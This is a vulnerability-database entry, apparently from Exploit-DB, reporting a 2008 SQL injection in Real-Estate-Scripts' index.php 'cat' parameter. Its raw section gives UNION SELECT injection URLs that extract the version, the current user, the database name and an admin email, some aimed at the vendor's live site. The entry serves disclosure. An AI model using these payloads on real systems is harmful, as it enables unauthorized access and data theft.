SQL Injection in Real-Estate-Scripts

vendor:

Real-Estate-Scripts

by:

EgY Coders TM < Hakxer>

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Real-Estate-Scripts

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SQL Injection in Real-Estate-Scripts

A SQL injection vulnerability exists in Real-Estate-Scripts, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited to gain access to sensitive information such as usernames, passwords, and other confidential data. The vulnerability is due to insufficient sanitization of user-supplied input in the 'cat' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands. The attacker can then use the retrieved information to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

###############################################################################################
# Author : EgY Coders TM < Hakxer>
# Home : Www.educ-up.com
# Type Gap : SQL INJECTION
# script : Real-Estate-Scripts [see script] http://www.real-estate-scripts.com/demo.html
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk
#################################################################################################
####### [+] Bug in : index.php 
### POC
      http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+@@version,2,3/*
	  http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+user(),2,3/*
### Exploit
         [+] Get User 
# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+admin_email,2,3+from+ovi_anuntgratis.class_settings/*
         [+] Get Database Name
# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+database(),2,3/*

# [+] HaVe Fun .. ;


###############################################################################

-------------------------------- The End of Gap -----------------------------------

## Contact : aq5@windowslive.com
### Muslim Hacker .. I love you Mohammed Rasull Allah 
######################################################

# milw0rm.com [2008-10-12]